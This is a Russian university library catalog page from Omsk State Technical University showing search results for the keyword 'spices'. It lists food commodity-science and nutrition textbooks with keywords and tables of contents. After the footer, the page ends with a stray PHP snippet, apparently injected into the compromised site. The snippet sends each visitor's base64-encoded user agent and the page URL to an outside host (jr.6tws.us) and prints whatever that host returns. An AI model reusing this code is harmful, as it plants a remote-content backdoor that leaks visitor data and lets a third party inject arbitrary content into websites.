Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

296 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Пряности")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 45
1. 
Шепелев А. Ф. Товароведение и экспертиза вкусовых и алкогольных товаров [Текст] : Учеб. пособие для студ. высш. учеб. заведений / А. Ф. Шепелев, К. Р. Мхитарян. - 205 с.
2. 
Тимофеева В. А. Товароведение продовольственных товаров [Текст] : Учеб. пособие для студ. сред. проф.образования / В. А. Тимофеева, 2001. - 443 с.
Держатели документа (Информация об экземплярах) 
3. 
Товароведение и экспертиза продовольственных товаров [Текст] : Учеб. пособие для студ. высш. учеб. заведений / А. Ф. Шепелев, И. А. Печенежская, О. И. Кожухова и др. - 677 с.
Держатели документа (Информация об экземплярах) 
4. 
Товароведение и экспертиза потребительских товаров [Текст] : Учебник для студентов торговых вузов / рук. авт. кол. В.В. Шевченко, 2003. - 544 с.
Ключевые слова 
товароведение -- экспертиза товаров -- ЗЕРНОМУЧНЫЕ ТОВАРЫ -- КОНДИТЕРСКИЕ ТОВАРЫ -- МОЛОЧНЫЕ ТОВАРЫ -- ПИЩЕВЫЕ ЖИРЫ -- МЯСНЫЕ ТОВАРЫ -- РЫБНЫЕ ТОВАРЫ -- ТОВАРОВЕДЕНИЕ -- КОНСЕРВИРОВАНИЕ -- ТАРА -- УПАКОВКА -- КРУПА -- МУКИ -- ХЛЕБ -- ХЛЕБОБУЛОЧНЫЕ ИЗДЕЛИЯ -- МАКАРОННЫЕ ИЗДЕЛИЯ -- ТОВАРОВЕДЕНИЕ ПЛОДОВ И ОВОЩЕЙ -- ГРИБЫ -- ЧАЙ -- КОФЕ -- НАПИТКИ БЕЗАЛКОГОЛЬНЫЕ -- НАПИТКИ АЛКОГОЛЬНЫЕ -- ТАБАЧНАЯ ПРОДУКЦИЯ -- ПРЯНОСТИ -- ПРИПРАВЫ -- МЕД -- ТОВАРОВЕДЕНИЕ КОНДИТЕРСКИХ ТОВАРОВ -- ТОВАРОВЕДЕНИЕ МОЛОЧНЫХ ТОВАРОВ -- СЫР -- МОРОЖЕНОЕ -- МАЙОНЕЗ -- МЯСНЫЕ КОНСЕРВЫ -- ПОЛУФАБРИКАТЫ -- ЯЙЦА -- ИКРА
Держатели документа (Информация об экземплярах) 
5. 
Дубцов Г. Г. Товароведение пищевых продуктов [Текст] : Учеб. для студ. образоват. учрежд. сред. проф. образования / Г. Г. Дубцов, 2001. - 264 с.
Держатели документа (Информация об экземплярах) 
6. 
Михайлова М. С. Товароведение вкусовых товаров для официантов, барменов [Текст] : Учеб. пособие для студ. образоват. учреждений сред. проф. образования / М. С. Михайлова, 2002. - 255 с.
Держатели документа (Информация об экземплярах) 
7. 
Исупов В. П. Пищевые добавки и пряности [Текст] : История, состав и применение / В. П. Исупов, 2000. - 166,[3] с.
Оглавление 
  • СанПиН 2.3.2.560-96. Список пищевых добавок, разрешенных к применению при производстве пищевых продуктов. - с.150-167
Держатели документа (Информация об экземплярах) 
8. 
Барановский В. А. Продавец [Текст] : Учеб. пособие для уч-ся учеб. заведений нач. проф. образования / В. А. Барановский, Л. И. Рубцова, В. А. Тимофеева, 2003. - 447 с.
Ключевые слова 
ПРОДАВЕЦ -- ТОВАРОДВИЖЕНИЕ -- СЕТЬ ТОРГОВАЯ РОЗНИЧНАЯ -- ТОРГОВЛЯ РОЗНИЧНАЯ -- КООПЕРАЦИЯ ПОТРЕБИТЕЛЬСКАЯ -- МАГАЗИН - Планировка -- ЗАЛ ТОРГОВЫЙ -- ОБОРУДОВАНИЕ ТОРГОВОЕ -- ИНВЕНТАРЬ ТОРГОВЫЙ -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- ОБОРУДОВАНИЕ ПОДЪЕМНО - ТРАН -- АППАРАТ контрольно-кассовый -- ОБОРУДОВАНИЕ ХОЛОДИЛЬНОЕ -- ОБОРУДОВАНИЕ ВЕСОИЗМЕРИТЕЛЬН -- АССОРТИМЕНТ ТОВАРНЫЙ -- СПРОС ПОКУПАТЕЛЬСКИЙ -- ТАРА -- ТОВАРООБОРОТ -- ПРИЕМКА ТОВАРОВ -- РАБОЧЕЕ МЕСТО продавца -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ТОВАРЫ МОЛОЧНЫЕ -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- РЫБА -- ТОВАРЫ ВКУСОВЫЕ -- ЧАЙ -- КОФЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- ТАБАК - ТОРГОВЛЯ -- ПРЯНОСТИ -- ПРИПРАВА -- НАПИТОК АЛКОГОЛЬНЫЙ -- ЖИР ПИЩЕВОЙ -- МАСЛО РАСТИТЕЛЬНОЕ -- МАРГАРИН -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ТОВАРЫ текстильные -- ТОВАРЫ швейные -- ТОВАРЫ ТРИКОТАЖНЫЕ -- ТОВАРЫ ОБУВНЫЕ -- ТОВАРЫ ГАЛАНТЕРЕЙНЫЕ -- ТОВАРЫ ПАРФЮМЕРНО-КОСМЕТИЧЕС -- КУЛЬТТОВАРЫ -- ТОВАРЫ СТЕКЛЯННЫЕ -- ТОВАРЫ КЕРАМИЧЕСКИЕ -- ТОВАРЫ МЕТАЛЛОХОЗЯЙСТВЕННЫЕ
Держатели документа (Информация об экземплярах) 
9. 
Барановский В. А. Повар-технолог [Текст] : Учеб. пособие для студ. сред. спец. заведений / В. А. Барановский, 2003. - 415 с.
Ключевые слова 
ФИЗИОЛОГИЯ ПИТАНИЯ -- САНИТАРИЯ -- ГИГИЕНА ОБЩЕСТВЕННОГО ПИТАНИ -- ПИТАНИЕ -- ГИГИЕНА ЛИЧНАЯ повара -- ОБРАБОТКА продуктов -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА КРОЛИКОВ -- БЛЮДА ХОЛОДНЫЕ -- БЛЮДА горячие -- ЗАКУСКА -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- СУП -- СОУС -- ПРЯНОСТИ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА СЛАДКИЕ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- НАПИТКИ -- ТЕСТО -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО БЕЗДРОЖЖЕВОЕ -- ТЕСТО слоеное -- ТЕСТО песочное -- ТЕСТО бисквитное -- ТЕСТО заварное
Держатели документа (Информация об экземплярах) 
10. 
Чепурной, И. П. Идентификация и фальсификация продовольственных товаров [Текст] : учебник / И. П. Чепурной, 2002. - 460 с.
Держатели документа (Информация об экземплярах) 
11. 
Митвайс, Ирина Ивановна. Товароведение вкусовых товаров [Текст] : Уч.пособие / И. И. Митвайс, 2002. - 480 с.
12. 
Эвенштейн, Зиновий Михайлович. Популярная диетология [Текст] / З. М. Эвенштейн, 1990. - 316, [3] с.
Ключевые слова 
ФИЗИОЛОГИЯ -- БИОХИМИЯ -- ПИТАНИЕ -- РАЦИОНАЛЬНОЕ -- ДИЕТА -- КУЛИНАРИЯ -- ВОЛОКНО ПИЩЕВОЕ -- КИСЛОТЫ ОРГАНИЧЕСКИЕ -- ВЕЩЕСТВО ДУБИЛЬНОЕ -- ПИГМЕНТЫ -- ФИТОНЦИДЫ -- ХОЛЕСТЕРИН - ПИТАНИЕ -- ПИЩЕВОРЕНИЕ -- ВКУС ПИЩИ -- АППЕТИТ -- ЖАЖДА -- ГОМЕОСТАЗ -- АЛЛЕРГИЯ ПИЩЕВАЯ -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- МАССА ТЕЛА НОРМАЛЬНАЯ -- ОЖИРЕНИЕ -- ДИЕТОТЕРАПИЯ -- КУЛИНАРИЯ ДИЕТИЧЕСКАЯ -- БЛЮДА ДИЕТИЧЕСКИЕ -- СЛАДКОЕДЕНИЕ -- СОЛЬ ПОВАРЕННАЯ -- ПРЯНОСТИ -- КОФЕ -- ВИНО -- ЦЕННОСТЬ ПИЩЕВАЯ
13. 
Чепурной, Иван Петрович. Товароведение и экспертиза вкусовых товаров [Текст] : Учеб. для вузов по специальности "Товароведение и экспертиза товаров" / И. П. Чепурной, 2002. - 402, [1] с.

Вкусовые товары включают очень разнообразные по составу и свойствам <продовольственные> товары: <чай> и <кофе>, <пряности> и <приправы>, <безалкогольные> и <алкогольные> <напитки>. В данной книге представлены достаточно полные сведения о классификации этих групп товаров, приводятся факторы, формирующие и сохраняющие их <качество>.

Впервые приводятся методологические подходы к проведению экспертизы этой группы товаров с использованием как современных методов анализа, так и оригинальных экспресс-методов.

14. 
Тимофеева, Валентина Афанасьевна. Товароведение продовольственных товаров [Текст] : Учеб. пособие для образоват. учреждений сред. и проф. образования по специальности 0612 "Товароведение" / В. А. Тимофеева, 2002. - 447 с.
Ключевые слова 
ПРОДОВОЛЬСТВЕННЫЕ ТОВАРЫ -- КОНДИТЕРСКИЕ ТОВАРЫ -- МОЛОЧНЫЕ ТОВАРЫ -- ПИЩЕВЫЕ ЖИРЫ -- МЯСНЫЕ ПРОДУКТЫ -- ЯИЧНЫЕ ТОВАРЫ -- РЫБНЫЕ ТОВАРЫ -- ВКУСОВЫЕ ТОВАРЫ -- ПЛОДООВОЩЫЕ ТОВАРЫ -- ЗЕРНО -- ПИЩЕВЫЕ КОНЦЕНТРАТЫ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК чайный -- ПРЯНОСТИ -- ТАБАК -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- Крахмал -- Сахар -- Мед -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- МОЛОКО -- Мороженое -- СЫР -- ЖИР пищевой -- Масло растительное -- Маргарин -- Жир кулинарный -- МЯСО -- ЯЙЦЕПРОДУКТЫ -- Концентрат пищевой -- РЫБА

В книге рассматриваются основные вопросы товароведения продовольственных товаров в современных условиях; приведены необходимые <продавцу> и <товароведу> сведения по всем группам <товаров>, а также по вопросам <стандартизации> и <сертификации>, информационному обеспечению, которые позволят работникам торговли принимать квалифицированные решения в <коммерческой деятельности>.

15. 
Машанов, Василий Иванович. Пряноароматические растения [Текст] / В. И. Машанов, А. А. Покровский, 1991. - 286, [1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
16. 
Артюхова, Светлана Ивановна. Основы пищевой биотехнологии и нанотехнологии [Текст] : учеб. пособие / С. И. Артюхова, Ю. А. Гаврилова, 2010. - 310 с.
Оглавление 
  • Введение. - с.6
  • Питание человека. Общие положения. - с.8
  • Роль пищи для организма человека. - с.8
  • Теория питания. - с.9
  • Физиология пищеварения. - с.28
  • Пищевой рацион современного человека. - с.39
  • Основные нарушения питания и их влияние на здоровье. - с.40
  • Контрольные вопросы. - с.42
  • Характеристика важнейших компонентов пищи. - с.43
  • Белки. - с.43
  • Характеристика белков. - с.45
  • Функциональные свойства белка. - с.46
  • Превращение белков при производстве пищевых продуктов. - с.51
  • Липиды. - с.54
  • Характеристики липидов. - с.54
  • Функциональные свойства липидов. - с.57
  • Превращение липидов при производстве пищевых продуктов. - с.60
  • Углеводы. - с.64
  • Характеристика углеводов. - с.64
  • Физиологическое значение углеводов. - с.68
  • Превращение углеводов при производстве пищевых продуктов. - с.70
  • Минеральные вещества. - с.73
  • Характеристика минеральных веществ. - с.73
  • Физиологическое значение минеральных веществ для организма человека. - с.75
  • Влияние технологической обработки на витаминный состав пищевых продуктов. - с.94
  • Ферменты. - с.97
  • Характеристика ферментов. - с.97
  • Применение ферментных препаратов в пищевых биотехнологиях. - с.104
  • Вода. - с.106
  • Характеристика воды. - с.106
  • Свободная и связанная влага в пищевых продуктах. - с.109
  • Активность воды. - с.111
  • Контрольные вопросы. - с.113
  • Пищевые добавки. - с.114
  • Характеристика и классификация пищевых добавок. - с.114
  • Гигиеническая регламентация пищевых добавок в продуктах питания. - с.117
  • Характеристика некоторых пищевых добавок. - с.120
  • Ароматизаторы. - с.120
  • Красители. - с.123
  • Подсластители. - с.132
  • Пряности. - с.136
  • Специи. - с.144
  • Пищевые кислоты. - с.158
  • Контрольные вопросы. - с.163
  • Биологически активные добавки. - с.164
  • Биологически активные добавки. - с.164
  • Эубиотики - биологически активные вещества для здоровья. - с.169
  • Пробиотики. - с.170
  • Пребиотики. - с.186
  • Синбиотики. - с.201
  • Контрольные вопросы. - с.204
  • Научные основы биотехнологии современных продуктов питания. - с.205
  • Теоретические принципы конструирования и проектирования продуктов питания. - с.205
  • Проектирование состава и свойств функциональных продуктов питания. - с.208
  • Получение пищевых продуктов, ингредиентов, материалов на основе биокаталических процессов обработки коллагенсодержащих животных тканей. - с.215
  • Современные физические методы обработки молочного сырья и пути их использования в производстве функциональных продуктов питания. - с.217
  • Инновационные методы в производстве функциональных продуктов на основе последних достижений науки и техники. - с.223
  • Основные направления пищевых нанотехнологий . - с.227
  • Нанонутриенты. - с.229
  • Наноструктурированные пищевые продукты. - с.230
  • Наноинкапсулированные пищевые вещества. - с.231
  • Нанотранспортные системы, биологически активные добавки к пище и пищевые добавки. - с.234
  • Особенности применения нанотехнологий в молочной промышленности. - с.235
  • Нанотехнологии в пастеризации молока. Низкотемпературные пастеризаторы с инфракрасным нагревом. - с.240
  • Применение нанотехнологий в других отраслях пищевой промышленности. - с.243
  • Применение нанотехнологии при производстве упаковочных материалов для пищевых продуктов и материалов, контактирующих с ними. - с.246
  • Проблемы контроля и оценки безопасности искусственных наноматериалов в составе пищевых продуктов. - с.252
  • Контрольные вопросы. - с.263
  • Искусственная и генномодифицированная пища. - с.264
  • Искусственная пища. - с.364
  • Генетически модифицированные продукты. - с.266
  • Контрольные вопросы. - с.277
  • Заключение. - с.278
  • Библиографический список. - с.279
  • Предметный указатель. - с.300
Держатели документа (Информация об экземплярах) 

В учебном пособии изложены основы пищевой биотехнологии и нанотехнологии.

Полный текст
17. 
Коробкина, Зоя Васильевна. Товароведение и экспертиза вкусовых товаров [Текст] : Учебник гриф-МО / З. В. Коробкина, С. А. Страхова, 2003. - 352 с.
18. 
Товароведение и экспертиза потребительских товаров [Текст] : Учебник гриф-МО / рук. работы В. В. Шевченко, 2006. - 544 с.
Держатели документа (Информация об экземплярах) 
19. 
Чепурной, Иван Петрович. Товароведение и экспертиза вкусовых товаров [Текст] : Учебник гриф-МО / И. П. Чепурной, 2005. - 404 с.
Держатели документа (Информация об экземплярах) 
20. 
Кругляков, Геннадий Николаевич. Товароведение продовольственных товаров [Текст] : Учеб. / Г. Н. Кругляков, Г. В. Круглякова, 2000. - 447 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2808 - 16.02.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.93 с.12 запросов, 0.60c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;